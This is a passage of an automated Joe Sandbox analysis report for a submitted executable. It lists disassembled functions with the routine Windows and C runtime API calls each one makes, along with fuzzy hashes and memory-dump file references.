                                                                                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                    Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                    Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 896007046-0
                                                                                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                    Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429747543-0
                                                                                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                    Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3300667738-0
                                                                                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                    Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu$\VH
                                                                                                                    • API String ID: 3164766367-2432546070
                                                                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                    Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 3850602802-3636473452
                                                                                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                    Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 0041F707
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • _free.LIBCMT ref: 0041F71A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                    • String ID: [B
                                                                                                                    • API String ID: 1020059152-632041663
                                                                                                                    • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                    • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                    Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                    • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                    • __getptd.LIBCMT ref: 00413DBD
                                                                                                                    • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                    • _free.LIBCMT ref: 00413E07
                                                                                                                    • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 155776804-0
                                                                                                                    • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                    • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                    • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                    • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                    Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                    Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259663610-0
                                                                                                                    • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                    • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                    • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                    • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                    Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3220332590-0
                                                                                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                    Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1612042205-0
                                                                                                                    • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
